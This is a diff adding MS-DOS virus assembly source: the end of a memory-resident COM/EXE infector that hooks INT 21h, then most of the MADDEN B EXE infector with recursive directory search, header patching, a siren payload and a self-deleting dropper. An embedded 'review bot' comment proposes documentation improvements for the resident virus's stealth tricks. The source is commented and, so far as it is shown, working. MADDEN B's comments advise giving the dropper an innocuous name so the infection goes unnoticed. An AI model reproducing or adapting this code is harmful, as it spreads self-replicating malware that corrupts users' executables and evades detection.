+ xor di,di
+ push ds
+ pop es
+ retf ; jump to host
+
+c_com db 'COM'
+ db 'EXE'
+ db 'exe'
+ db 'com'
+
+c_21:
+ pushf
+ call dword ptr cs:[ofs_int21]
+ ret
+
+int_24: mov al,3
+ iret
+
+ db '[Internal Overlay, Tcp / 29A]'
+
+int_21:
+ cmp ah,4ah ; Can be our call
+ jne f_func
+ push ax
+ push di
+ mov ax,'<>'
+ sub ax,cx
+ shr di,1
+ sub ax,di
+ inc ax ; If 0 -> our call
+ pop di
+ pop ax
+ jnz f_func
+ pop cx ; We're not interested in offset
+ pop di ; Interested in code segment
+ pop cx ; We're not interested in flags
+ pop dx
+ pop ds ; ds:dx -> file name
+ mov ax,3d00h
+ call c_21 ; Open file
+ xchg ax,bx ; bx:=handle
+ mov ds,di
+ mov cx,[si+long_high] ; Restore data
+ mov dx,[si+long_low]
+ add dx,offset(original)-offset(ov_part)
+ adc cx,0
+ mov ax,4200h
+ int 21h ; Postion on overlay's portion that
+ ; keeps original code
+ mov dx,si
+ mov ah,3fh
+ mov cx,offset(ov_part)
+ int 21h ; We read
+ mov ah,3eh
+ int 21h ; We close the file
+ add [si+1],bp ; Reallocate Pklite's item (add 0 otherwise)
+ jmp exec_host
+
+f_func:
+ push bx
+ push cx
+ push dx
+ push bp
+ push ds
+ push es
+ push si
+ push di
+ push ax
+ mov di,dx
+ mov al,0
+ mov cx,666h ;-)
+ repnz scasb
+ sub di,4 ; filename.ext
+ ; ^
+ pop ax
+ push ax
+ cmp ax,4b00h ; file execution?
+ je is_exec
+ cmp ah,3dh ; open-file?
+ je check_ext
+end_21:
+ pop ax
+ pop di
+ pop si
+ pop es
+ pop ds
+ pop bp
+ pop dx
+ pop cx
+ pop bx
+ db 0eah ; jmp far
+ofs_int21 dw ?
+seg_int21 dw ?
+
+check_ext:
+ push ds
+ push cs
+ pop ds
+ mov si,offset(c_com)
+ mov cx,4
+loop_ext: push si ; check valid extensions
+ push di
+ cmpsw
+ jne next_ext
+ cmpsb
+next_ext: pop di
+ pop si
+ je ext_ok
+ add si,3
+ loop loop_ext
+ pop ds
+ or cx,cx
+ jz end_21
+ext_ok: pop ds
+is_exec:
+ cmp byte ptr ds:[di-2],'D' ; Don't infect command.com
+ jz end_21
+ cmp byte ptr ds:[di-2],'d'
+ jz end_21
+ mov ax,3524h ; Read and prepare int 24h
+ int 21h
+ push es
+ push bx
+ mov ah,25h
+ push ax ; 2524h
+ push ds
+ push dx
+ push cs
+ pop ds
+ mov dx,offset(int_24)
+ int 21h
+ pop dx
+ pop ds
+ mov ax,4300h
+ int 21h ; Get attribs
+ push cx
+ push ds
+ push dx
+ xor cx,cx
+ mov ax,4301h ; Reset all attribs
+ int 21h
+ jb rest_atribs
+ mov ax,3d02h
+ call c_21 ; Open the file I/O
+ push cs
+ pop ds
+ xchg ax,bx ; bx:=handle
+ mov ax,5700h
+ int 21h ; Get time/date
+ push dx
+ push cx
+ mov ah,3fh
+ mov dx,offset(header)
+ mov cx,1Ch
+ int 21h ; Read file header
+ mov ax,val_ip
+ mov delta_ofs,ax
+ xchg bp,ax ; bp:=val_ip
+ cmp signature,'ZM' ; EXE?
+ je exe
+ ; Assume it's a com
+ cmp byte ptr signature,0e9h ; jmp?
+ jne rest_hour
+ mov ax,word ptr signature+1 ; Offset jmp
+ add ax,3 ; Calculate file's offset
+ mov delta_ofs,ax
+ add delta_ofs,100h
+ xor dx,dx
+ xor cx,cx
+ jz exe&com
+
+rest_hour: mov ax,5701h ; Restore date/time
+ pop cx
+ pop dx
+ int 21h
+ mov ah,3eh ; We close
+ int 21h
+rest_atribs: mov ax,4301h ; Restore attribs
+ pop dx
+ pop ds ; ds:dx -> file name
+ pop cx
+ int 21h
+ pop ax ; ax:=2524h
+ pop dx
+ pop ds
+ int 21h
+ jmp end_21
+
+exe:
+ mov ax,header_size
+ mov cx,16
+ mul cx ; ax:=header length
+ push ax
+ mov ax,val_cs
+ imul cx
+ add ax,bp ; bp:=val_ip
+ adc dx,0 ; dx:ax := cs:ip inside load module
+ mov cx,relo_items ; Number of reallocation items
+ jcxz items_ok
+ push cx
+ push ax
+ push dx
+ xor cx,cx ; Get on reallocation table
+ mov dx,ofs_reloc
+ mov ax,4200h
+ int 21h
+ pop dx
+ pop ax
+read_items:
+ push ax
+ push dx
+ mov ah,3fh
+ mov dx,offset(original)
+ mov cx,20*4 ; Read 20 reallocaci¢n items
+ int 21h
+ mov si,dx
+ mov di,-20*4
+ pop dx
+ pop ax
+process_item: pop cx
+ push bx
+ mov bx,[si]
+ cmpsw ; inc si, inc si, inc di, inc di
+ mov bp,[si]
+ cmpsw ; inc si, inc si, inc di, inc di
+
+ sub bx,ax
+ sbb bp,dx
+ jnz next_item
+ cmp bx,offset(ov_part) ; Is it part of code?
+ jnbe next_item
+ cmp bx,7 ; PkLite's code?
+ pop bx
+ jnz bad_item
+ push bx
+next_item: dec cx
+ pop bx
+ jcxz items_ok
+ or di,di ; We need read more items?
+ push cx
+ jnz process_item
+ jz read_items
+items_ok:
+ pop cx ; cx:= header length
+exe&com: add ax,cx
+ adc dx,0 ; dx:ax := cs:ip offset in file
+ push ax
+ push dx
+ mov cx,dx
+ xchg ax,dx ; = mov dx,ax
+ mov ax,4200h
+ int 21h ; get on the entry point
+ mov ah,3fh
+ mov cx,offset(ov_part)
+ mov dx,offset(original)
+ int 21h ; Read original code
+ sub ax,cx ; Have enough space?
+ jc no_inf
+ cmp pages,'<>' ; Id mark is in offset 4
+ stc
+ je no_inf
+ mov ax,4202h ; Go to he end of file
+ xor cx,cx
+ cwd
+ int 21h
+ mov long_high,dx ; Save file-offset of code
+ mov long_low,ax
+ mov ah,40h ; 'Stick' to the file
+ mov cx,offset(end_vir)
+ mov dx,offset(ov_part)
+ int 21h
+no_inf: pop cx
+ pop dx
+ jc alr_inf
+ mov reloc_pkl,0
+ mov ax,4200h
+ int 21h ; Return to cs:ip
+ mov ah,40h
+ mov cx,offset(ov_part)
+ cwd
+ int 21h ; Write new code on entry-point
+ push cx
+bad_item: pop cx
+alr_inf: jmp rest_hour
+
+end_vir:
+
+original:
+header:
+signature dw 20cdh
+image_size dw ?
+pages dw ?
+relo_items dw ?
+header_size dw ?
+mim_mem dw ?
+max_mem dw ?
+stack_seg dw ?
+stack_ofs dw ?
+checksum dw ?
+val_ip dw ?
+val_cs dw ?
+ofs_reloc dw ?
+overlays dw ?
+
+code ends
+ end start
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.intr1440.asm b/MSDOS/Virus.MSDOS.Unknown.intr1440.asm
new file mode 100644
index 00000000..149c7d8b
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.intr1440.asm
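Review bot: The long header describes the file-infection scheme but says nothing about the resident side, which is what a memory-level detection or an analyst's triage would key on: after `ov_part` the code rewrites its own MCB owner word to 8 (`mov word ptr es:[0001],8 ; O.S. block`) so the block presents as DOS-owned, and `int_24` answers every critical error with AL=3 (fail) so a write-protected or faulty disk never raises the DOS abort/retry prompt while it is working. Both belong in the header next to the 4b00h/3dh triggers, e.g. `; Resident copy marks its MCB owner as DOS (8) and installs an INT 24h stub returning AL=3 (fail) for every critical error.`. Style: `mov cx,666h ;-)` is the only explanation of the bound on the `repnz scasb` filename scan in `f_func`, and `0eah ; jmp far` plus the `dw ?` pair after it spell out a self-patching far jump; a named constant and a one-line comment stating that `ofs_int21`/`seg_int21` are the operand of that jump would make the hook layout readable without reverse-engineering it.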
@@ -0,0 +1,771 @@ +;The MADDEN B virus is an EXE file infector which can jump from directory to +;directory and disk to disk. It attaches itself to the end of a file and +;modifies the EXE file header so that it gets control first, before the host +;program. When it is done doing its job, it passes control to the host program, +;so that the host executes without a hint that the virus is there. + + + .SEQ ;segments must appear in sequential order + ;to simulate conditions in actual active virus + + +;MGROUP GROUP HOSTSEG,HSTACK ;Host stack and code segments grouped together + +;HOSTSEG program code segment. The virus gains control before this routine and +;attaches itself to another EXE file. As such, the host program for this +;installer simply tries to delete itself off of disk and terminates. That is +;worthwhile if you want to infect a system with the virus without getting +;caught. Just execute the program that infects, and it disappears without a +;trace. You might want to name the program something more innocuous, though. +;MADDEN B also locks the pc into a 'siren' warble when it runs out +;of files to infect. MADDEN, included in this archive plays a fast country +;song. (MADDEN will assemble to an .file using a86, then link to produce +;infected .exe form) + +HOSTSEG SEGMENT BYTE + ASSUME CS:HOSTSEG,SS:HSTACK + +PGMSTR DB 'MADDENB.EXE',0 + +HOST: + mov ax,cs ;we want DS=CS here + mov ds,ax + mov dx,OFFSET PGMSTR + mov ah,41H + int 21H ;delete this exe file + mov ah,4CH + mov al,0 + int 21H ;terminate normally +HOSTSEG ENDS + + +;Host program stack segment + +HSTACK SEGMENT PARA STACK + db 100H dup (?) 
;100 bytes long +HSTACK ENDS + +;------------------------------------------------------------------------ +;This is the virus itself + +STACKSIZE EQU 100H ;size of stack for the virus +NUMRELS EQU 2 ;number of relocatables in the virus, which must go in the relocatable pointer table + +;VGROUP GROUP VSEG,VSTACK ;Virus code and stack segments grouped together + +;MADDEN Virus code segment. This gains control first, before the host. As this +;ASM file is layed out, this program will look exactly like a simple program +;that was infected by the virus. + +VSEG SEGMENT PARA + ASSUME CS:VSEG,DS:VSEG,SS:VSTACK + +;data storage area comes before any code +VIRUSID DW 0C8AAH ;identifies virus +OLDDTA DD 0 ;old DTA segment and offset +DTA1 DB 2BH dup (?) ;new disk transfer area +DTA2 DB 56H dup (?) ;dta for directory finds (2 deep) +EXE_HDR DB 1CH dup (?) ;buffer for EXE file header +EXEFILE DB '\*.EXE',0 ;search string for an exe file +ALLFILE DB '\*.*',0 ;search string for any file +USEFILE DB 78 dup (?) 
;area to put valid file path +LEVEL DB 0 ;depth to search directories for a file +HANDLE DW 0 ;file handle +FATTR DB 0 ;old file attribute storage area +FTIME DW 0 ;old file time stamp storage area +FDATE DW 0 ;old file date stamp storage area +FSIZE DD 0 ;file size storage area +VIDC DW 0 ;storage area to put VIRUSID from new host .EXE in, to check if virus already there +VCODE DB 1 ;identifies this version +COUNT1 DW 8 ;delay counts used by 'siren' routine +COUNT2 DW 3 +COUNT3 DW 20 +COUNT4 DW 10 +;-------------------------------------------------------------------------- +;MADDEN B virus main routine starts here +VIRUS: + push ax ;save startup info in ax + mov ax,cs + mov ds,ax ;set up DS=CS for the virus + mov ax,es ;get PSP Seg + mov WORD PTR [OLDDTA+2],ax ;set up default DTA Seg=PSP Seg in case of abort without getting it + call SHOULDRUN ;run only when certain conditions met signalled by z set + jnz REL1 ;conditions aren't met, go execute host program + call SETSR ;modify SHOULDRUN procedure to activate conditions + call NEW_DTA ;set up a new DTA location + call FIND_FILE ;get an exe file to attack + jnz SIREN ;returned nz - no valid files left, siren time! 
+ call SAVE_ATTRIBUTE ;save the file attributes and leave file opened in r/w mode + call INFECT ;move program code to file we found to attack + call REST_ATTRIBUTE ;restore the original file attributes and close the file +FINISH: call RESTORE_DTA ;restore the DTA to its original value at startup + pop ax ;restore startup value of ax +REL1: ;relocatable marker for host stack segment + mov bx,HSTACK ;set up host program stack segment (ax=segment) + cli ;interrupts off while changing stack + mov ss,bx +REL1A: ;marker for host stack pointer + mov sp,OFFSET HSTACK + mov es,WORD PTR [OLDDTA+2] ;set up ES correctly + mov ds,WORD PTR [OLDDTA+2] ;and DS + sti ;interrupts back on +REL2: ;relocatable marker for host code segment + jmp FAR PTR HOST ;begin execution of host program + +;-------------------------------------------------------------------------- +;First Level - Find a file which passes FILE_OK +; +;This routine does a complex directory search to find an EXE file in the +;current directory, one of its subdirectories, or the root directory or one +;of its subdirectories, to find a file for which FILE_OK returns with C reset. +;If you want to change the depth of the search, make sure to allocate enough +;room at DTA2. This variable needs to have 2BH * LEVEL bytes in it to work, +;since the recursive FINDBR uses a different DTA area for the search (see DOS +;functions 4EH and 4FH) on each level. +; +FIND_FILE: + mov al,'\' ;set up current directory path in USEFILE + mov BYTE PTR [USEFILE],al + mov si,OFFSET USEFILE+1 + xor dl,dl + mov ah,47H + int 21H ;get current dir, USEFILE= \dir + cmp BYTE PTR [USEFILE+1],0 ;see if it is null. 
If so, its the root + jnz FF2 ;not the root + xor al,al ;make correction for root directory, + mov BYTE PTR [USEFILE],al ;by setting USEFILE = '' +FF2: mov al,2 + mov [LEVEL],al ;search 2 subdirs deep + call FINDBR ;attempt to locate a valid file + jz FF3 ;found one - exit + xor al,al ;nope - try the root directory + mov BYTE PTR [USEFILE],al ;by setting USEFILE= '' + inc al ;al=1 + mov [LEVEL],al ;search one subdir deep + call FINDBR ;attempt to find file +FF3: + ret ;exit with z flag set by FINDBR to indicate success/failure + +;*************************************************************************** +;This routine enables MADDEN B virus to sound a siren +;when it can't find a file to infect +;************************************************************************** +SIREN: + cli ;no interrupts + mov bp,15 ;we want to do hole thing 15 times + mov al,10110110xb ;set up channel 2 + out 43h,al ;send it to port +AGIN: mov bx,500 ;start frequency high +BACKERX:mov ax,bx ;place it in (ax) + out 42h,al ;send LSB first + mov al,ah ;move MSB into al + out 42h,al ;send it next + in al,61h ;get value from port + or al,00000011xb ;ORing it will turn on speaker + out 61h,al ;send number + mov cx,COUNT1 ;number of delay loops +LOOPERX:loop LOOPERX ;so we can hear sound + inc bx ;increment (bx) lowers frequency pitch + cmp bx,4000 ;have we reached 4000 + jnz BACKERX ;if not do again +BACKERY:mov ax,bx ;if not put (bx) in (ax) + out 42h,al ;send LSB to port + mov al,ah ;place MSB in al + out 42h,al ;send it now + in al,61h ;get value from port + or al,00000011xb ;lets OR it + out 61h,al ;time to turn on speaker + mov cx,COUNT2 ;loop count +LOOPERY:loop LOOPERY ;delay so we can hear sound + dec bx ;decrementing (bx) rises frequency pitch + cmp bx,500 ;have we reach 500 + jnz BACKERY ;if not go back + mov si,COUNT3 ;place longer delay in (si) + mov di,COUNT4 ;place longer delay in (di) + push si ;push it on the stack + push di ;push it on the stack + mov si,COUNT1 ;place first 
delay in (si) + mov di,COUNT2 ;place second delay in (di) + mov COUNT3,si ;save 1st in COUNT3 for next exchange + mov COUNT4,di ;save 2nd in COUNT4 for next exchange + pop di ;pop longer delay off stack + pop si ;pop longer delay off stack + mov COUNT2,di ;place it in the second + mov COUNT1,si ;place it in the first + dec bp ;decrement repeat count + jnz AGIN ;if not = 0 do hole thing again + in al,61h ;we be done + and al,11111100xb ;this number will turn speaker off + out 61h,al ;send it + sti ;enable interrupts + jmp SIREN + +;-------------------------------------------------------------------------- +;SEARCH FUNCTION +;--------------------------------------------------------------------------- +;Second Level - Find in a branch +; +;This function searches the directory specified in USEFILE for EXE files. +;after searching the specified directory, it searches subdirectories to the +;depth LEVEL. If an EXE file is found for which FILE_OK returns with C reset, this +;routine exits with Z set and leaves the file and path in USEFILE +; +FINDBR: + call FINDEXE ;search current dir for EXE first + jnc FBE3 ;found it - exit + cmp [LEVEL],0 ;no - do we want to go another directory deeper? 
+ jz FBE1 ;no - exit + dec [LEVEL] ;yes - decrement LEVEL and continue + mov di,OFFSET USEFILE ;'\curr_dir' is here + mov si,OFFSET ALLFILE ;'\*.*' is here + call CONCAT ;get '\curr_dir\*.*' in USEFILE + inc di + push di ;store pointer to first * + call FIRSTDIR ;get first subdirectory + jnz FBE ;couldn't find it, so quit +FB1: ;otherwise, check it out + pop di ;strip \*.* off of USEFILE + xor al,al + stosb + mov di,OFFSET USEFILE + mov bx,OFFSET DTA2+1EH + mov al,[LEVEL] + mov dl,2BH ;compute correct DTA location for subdir name + mul dl ;which depends on the depth we're at in the search + add bx,ax ;bx points to directory name + mov si,bx + call CONCAT ;'\curr_dir\sub_dir' put in USEFILE + push di ;save position of first letter in sub_dir name + call FINDBR ;scan the subdirectory and its subdirectories (recursive) + jz FBE2 ;if successful, exit + call NEXTDIR ;get next subdirectory in this directory + jz FB1 ;go check it if search successful +FBE: ;else exit, NZ set, cleaned up + inc [LEVEL] ;increment the level counter before exit + pop di ;strip any path or file spec off of original + xor al,al ;directory path + stosb +FBE1: mov al,1 ;return with NZ set + or al,al + ret + +FBE2: pop di ;successful exit, pull this off the stack +FBE3: xor al,al ;and set Z + ret ;exit + +;-------------------------------------------------------------------------- +;Third Level - Part A - Find an EXE file +; +;This function searches the path in USEFILE for an EXE file which passes +;the test FILE_OK. This routine will return the full path of the EXE file +;in USEFILE, and the c flag reset, if it is successful. Otherwise, it will return +;with the c flag set. It will search a whole directory before giving up. 
+; +FINDEXE: + mov dx,OFFSET DTA1 ;set new DTA for EXE search + mov ah,1AH + int 21H + mov di,OFFSET USEFILE + mov si,OFFSET EXEFILE + call CONCAT ;set up USEFILE with '\dir\*.EXE' + push di ;save position of '\' before '*.EXE' + mov dx,OFFSET USEFILE + mov cx,3FH ;search first for any file + mov ah,4EH + int 21H +NEXTEXE: + or al,al ;is DOS return OK? + jnz FEC ;no - quit with C set + pop di + inc di + stosb ;truncate '\dir\*.EXE' to '\dir\' + mov di,OFFSET USEFILE + mov si,OFFSET DTA1+1EH + call CONCAT ;setup file name '\dir\filename.exe' + dec di + push di + call FILE_OK ;yes - is this a good file to use? + jnc FENC ;yes - valid file found - exit with c reset + mov ah,4FH + int 21H ;do find next + jmp SHORT NEXTEXE ;and go test it for validity + +FEC: ;no valid file found, return with C set + pop di + mov BYTE PTR [di],0 ;truncate \dir\filename.exe to \dir + stc + ret +FENC: ;valid file found, return with NC + pop di + ret + + +;-------------------------------------------------------------------------- +;Third Level - Part B - Find a subdirectory +; +;This function searches the file path in USEFILE for subdirectories, excluding +;the subdirectory header entries. If one is found, it returns with Z set, and +;if not, it returns with NZ set. +;There are two entry points here, FIRSTDIR, which does the search first, and +;NEXTDIR, which does the search next. +; +FIRSTDIR: + call GET_DTA ;get proper DTA address in dx (calculated from LEVEL) + push dx ;save it + mov ah,1AH ;set DTA + int 21H + mov dx,OFFSET USEFILE + mov cx,10H ;search for a directory + mov ah,4EH ;do search first function + int 21H +NEXTD1: + pop bx ;get pointer to search table (DTA) + or al,al ;successful search? + jnz NEXTD3 ;no, quit with NZ set + test BYTE PTR [bx+15H],10H ;is this a directory? + jz NEXTDIR ;no, find another + cmp BYTE PTR [bx+1EH],'.' ;is it a subdirectory header? 
+ jne NEXTD2 ;no - valid directory, exit, setting Z flag + ;else it was dir header entry, so fall through to next +NEXTDIR: ;second entry point for search next + call GET_DTA ;get proper DTA address again - may not be set up + push dx + mov ah,1AH ;set DTA + int 21H + mov ah,4FH + int 21H ;do find next + jmp SHORT NEXTD1 ;and loop to check the validity of the return + +NEXTD2: + xor al,al ;successful exit, set Z flag +NEXTD3: + ret ;exit routine + +;-------------------------------------------------------------------------- +;Return the DTA address associated to LEVEL in dx. This is simply given by +;OFFSET DTA2 + (LEVEL*2BH). Each level must have a different search record +;in its own DTA, since a search at a lower level occurs in the middle of the +;higher level search, and we don't want the higher level being ruined by +;corrupted data. +; +GET_DTA: + mov dx,OFFSET DTA2 + mov al,2BH + mul [LEVEL] + add dx,ax ;return with dx= proper dta offset + ret + +;-------------------------------------------------------------------------- +;Concatenate two strings: Add the asciiz string at DS:SI to the asciiz +;string at ES:DI. Return ES:DI pointing to the end of the first string in the +;destination (or the first character of the second string, after moved). +; +CONCAT: + mov al,byte ptr es:[di] ;find the end of string 1 + inc di + or al,al + jnz CONCAT + dec di ;di points to the null at the end + push di ;save it to return to the caller +CONCAT2: + cld + lodsb ;move second string to end of first + stosb + or al,al + jnz CONCAT2 + pop di ;and restore di to point to end of string 1 + ret + + +;-------------------------------------------------------------------------- +;Function to determine whether the EXE file specified in USEFILE is useable. +;if so return nc, else return c +;What makes an EXE file useable?: +; a) The signature field in the EXE header must be 'MZ'. (These +; are the first two bytes in the file.) +; b) The Overlay Number field in the EXE header must be zero. 
+; c) There must be room in the relocatable table for NUMRELS +; more relocatables without enlarging it. +; d) The word VIRUSID must not appear in the 2 bytes just before +; the initial CS:0000 of the test file. If it does, the virus +; is probably already in that file, so we skip it. +; +FILE_OK: + call GET_EXE_HEADER ;read the EXE header in USEFILE into EXE_HDR + jc OK_END ;error in reading the file, so quit + call CHECK_SIG_OVERLAY ;is the overlay number zero? + jc OK_END ;no - exit with c set + call REL_ROOM ;is there room in the relocatable table? + jc OK_END ;no - exit + call IS_ID_THERE ;is id at CS:0000? +OK_END: ret ;return with c flag set properly + +;-------------------------------------------------------------------------- +;Returns c if signature in the EXE header is anything but 'MZ' or the overlay +;number is anything but zero. +CHECK_SIG_OVERLAY: + mov al,'M' ;check the signature first + mov ah,'Z' + cmp ax,WORD PTR [EXE_HDR] + jz CSO_1 ;jump if OK + stc ;else set carry and exit + ret +CSO_1: xor ax,ax + sub ax,WORD PTR [EXE_HDR+26];subtract the overlay number from 0 + ret ;c is set if it's anything but 0 + +;-------------------------------------------------------------------------- +;This function reads the 28 byte EXE file header for the file named in USEFILE. +;It puts the header in EXE_HDR, and returns c set if unsuccessful. +; +GET_EXE_HEADER: + mov dx,OFFSET USEFILE + mov ax,3D02H ;r/w access open file + int 21H + jc RE_RET ;error opening - C set - quit without closing + mov [HANDLE],ax ;else save file handle + mov bx,ax ;handle to bx + mov cx,1CH ;read 28 byte EXE file header + mov dx,OFFSET EXE_HDR ;into this buffer + mov ah,3FH + int 21H +RE_RET: ret ;return with c set properly + +;-------------------------------------------------------------------------- +;This function determines if there are at least NUMRELS openings in the +;current relocatable table in USEFILE. 
If there are, it returns with +;carry reset, otherwise it returns with carry set. The computation +;this routine does is to compare whether +; ((Header Size * 4) + Number of Relocatables) * 4 - Start of Rel Table +;is >= than 4 * NUMRELS. If it is, then there is enough room +; +REL_ROOM: + mov ax,WORD PTR [EXE_HDR+8] ;size of header, paragraphs + add ax,ax + add ax,ax + sub ax,WORD PTR [EXE_HDR+6] ;number of relocatables + add ax,ax + add ax,ax + sub ax,WORD PTR [EXE_HDR+24] ;start of relocatable table + cmp ax,4*NUMRELS ;enough room to put relocatables in? +RR_RET: ret ;exit with carry set properly + + +;-------------------------------------------------------------------------- +;This function determines whether the word at the initial CS:0000 in USEFILE +;is the same as VIRUSID in this program. If it is, it returns c set, otherwise +;it returns c reset. +; +IS_ID_THERE: + mov ax,WORD PTR [EXE_HDR+22] ;Initial CS + add ax,WORD PTR [EXE_HDR+8] ;Header size + mov dx,16 + mul dx + mov cx,dx + mov dx,ax ;cxdx = position to look for VIRUSID in file + mov bx,[HANDLE] + mov ax,4200H ;set file pointer, relative to beginning + int 21H + mov ah,3FH + mov bx,[HANDLE] + mov dx,OFFSET VIDC + mov cx,2 ;read 2 bytes into VIDC + int 21H + jc II_RET ;couldn't read - bad file - report as though ID is there so we dont do any more to this file + mov ax,[VIDC] + cmp ax,[VIRUSID] ;is it the VIRUSID? + clc + jnz II_RET ;if not, then virus is not already in this file + stc ;else it is probably there already +II_RET: ret + + +;-------------------------------------------------------------------------- +;This routine makes sure file end is at paragraph boundary, so the virus +;can be attached with a valid CS. Assumes file pointer is at end of file. 
+SETBDY: + mov al,BYTE PTR [FSIZE] + and al,0FH ;see if we have a paragraph boundary (header is always even # of paragraphs) + jz SB_E ;all set - exit + mov cx,10H ;no - write any old bytes to even it up + sub cl,al ;number of bytes to write in cx + mov dx,OFFSET FINAL ;set buffer up to point to end of the code (just garbage there) + add WORD PTR [FSIZE],cx ;update FSIZE + adc WORD PTR [FSIZE+2],0 + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H +SB_E: ret + +;-------------------------------------------------------------------------- +;This routine moves the virus (this program) to the end of the EXE file +;Basically, it just copies everything here to there, and then goes and +;adjusts the EXE file header and two relocatables in the program, so that +;it will work in the new environment. It also makes sure the virus starts +;on a paragraph boundary, and adds how many bytes are necessary to do that. +; +INFECT: + mov cx,WORD PTR [FSIZE+2] + mov dx,WORD PTR [FSIZE] + mov bx,[HANDLE] + mov ax,4200H ;set file pointer, relative to beginning + int 21H ;go to end of file + call SETBDY ;lengthen to a paragraph boundary if necessary + mov cx,OFFSET FINAL ;last byte of code + xor dx,dx ;first byte of code, DS:DX + mov bx,[HANDLE] ;move virus code to end of file being attacked with + mov ah,40H ;DOS write function + int 21H + mov dx,WORD PTR [FSIZE] ;find 1st relocatable in code (SS) + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL1 ;it is at FSIZE+REL1+1 in the file + inc bx + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx is that number + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to 1st relocatable + int 21H + mov dx,OFFSET EXE_HDR+14 ;get correct old SS for new program + mov bx,[HANDLE] ;from the EXE header + mov cx,2 + mov ah,40H ;and write it to relocatable REL1+1 + int 21H + mov dx,WORD PTR [FSIZE] + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL1A ;put in correct old SP from EXE header + inc bx ;at FSIZE+REL1A+1 + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx 
points to FSIZE+REL1A+1 + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to place to write SP to + int 21H + mov dx,OFFSET EXE_HDR+16 ;get correct old SP for infected program + mov bx,[HANDLE] ;from EXE header + mov cx,2 + mov ah,40H ;and write it where it belongs + int 21H + mov dx,WORD PTR [FSIZE] + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL2 ;put in correct old CS:IP in program + add bx,1 ;at FSIZE+REL2+1 on disk + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx points to FSIZE+REL2+1 + mov bx,[HANDLE] + mov ax,4200H ;set file pointer relavtive to start of file + int 21H + mov dx,OFFSET EXE_HDR+20 ;get correct old CS:IP from EXE header + mov bx,[HANDLE] + mov cx,4 + mov ah,40H ;and write 4 bytes to FSIZE+REL2+1 + int 21H + ;done writing relocatable vectors + ;so now adjust the EXE header values + xor cx,cx + xor dx,dx + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to start of file + int 21H + mov ax,WORD PTR [FSIZE] ;calculate new initial CS (the virus' CS) + mov cl,4 ;given by (FSIZE/16)-HEADER SIZE (in paragraphs) + shr ax,cl + mov bx,WORD PTR [FSIZE+2] + and bl,0FH + mov cl,4 + shl bl,cl + add ah,bl + sub ax,WORD PTR [EXE_HDR+8] ;(exe header size, in paragraphs) + mov WORD PTR [EXE_HDR+22],ax;and save as initial CS + mov bx,OFFSET FINAL ;compute new initial SS + add bx,10H ;using the formula SSi=(CSi + (OFFSET FINAL+16)/16) + mov cl,4 + shr bx,cl + add ax,bx + mov WORD PTR [EXE_HDR+14],ax ;and save it + mov ax,OFFSET VIRUS ;get initial IP + mov WORD PTR [EXE_HDR+20],ax ;and save it + mov ax,STACKSIZE ;get initial SP + mov WORD PTR [EXE_HDR+16],ax ;and save it + mov dx,WORD PTR [FSIZE+2] + mov ax,WORD PTR [FSIZE] ;calculate new file size + mov bx,OFFSET FINAL + add ax,bx + xor bx,bx + adc dx,bx ;put it in ax:dx + add ax,200H ;and set up the new page count + adc dx,bx ;page ct= (ax:dx+512)/512 + push ax + mov cl,9 + shr ax,cl + mov cl,7 + shl dx,cl + add ax,dx + mov WORD PTR [EXE_HDR+4],ax ;and save it here + pop ax + and ax,1FFH ;now calculate last page size 
+ mov WORD PTR [EXE_HDR+2],ax ;and put it here + mov ax,NUMRELS ;adjust relocatables counter + add WORD PTR [EXE_HDR+6],ax + mov cx,1CH ;and save data at start of file + mov dx,OFFSET EXE_HDR + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H + mov ax,WORD PTR [EXE_HDR+6] ;get number of relocatables in table + dec ax ;in order to calculate location of + dec ax ;where to add relocatables + mov bx,4 ;Location= (No in table-2)*4+Table Offset + mul bx + add ax,WORD PTR [EXE_HDR+24];table offset + mov bx,0 + adc dx,bx ;dx:ax=end of old table in file + mov cx,dx + mov dx,ax + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to table end + int 21H + mov ax,WORD PTR [EXE_HDR+22] ;and set up 2 pointers: init CS = seg of REL1 + mov bx,OFFSET REL1 + inc bx ;offset of REL1 + mov WORD PTR [EXE_HDR],bx ;use EXE_HDR as a buffer to + mov WORD PTR [EXE_HDR+2],ax ;save relocatables in for now + mov ax,WORD PTR [EXE_HDR+22] ;init CS = seg of REL2 + mov bx,OFFSET REL2 + add bx,3 ;offset of REL2 + mov WORD PTR [EXE_HDR+4],bx ;write it to buffer + mov WORD PTR [EXE_HDR+6],ax + mov cx,8 ;and then write 8 bytes of data in file + mov dx,OFFSET EXE_HDR + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H + ret ;that's it, infection is complete! + +;-------------------------------------------------------------------------- +;This routine determines whether the reproduction code should be executed. +;If it returns Z, the reproduction code is executed, otherwise it is not. +;Currently, it only executes if the system time variable is a multiple of +;TIMECT. As such, the virus will reproduce only 1 out of every TIMECT+1 +;executions of the program. TIMECT should be 2^n-1 +;Note that the ret at SR1 is replaced by a NOP by SETSR whenever the program +;is run. This makes SHOULDRUN return Z for sure the first time, so it +;definitely runs when this loader program is run, but after that, the time must +;be an even multiple of TIMECT+1. 
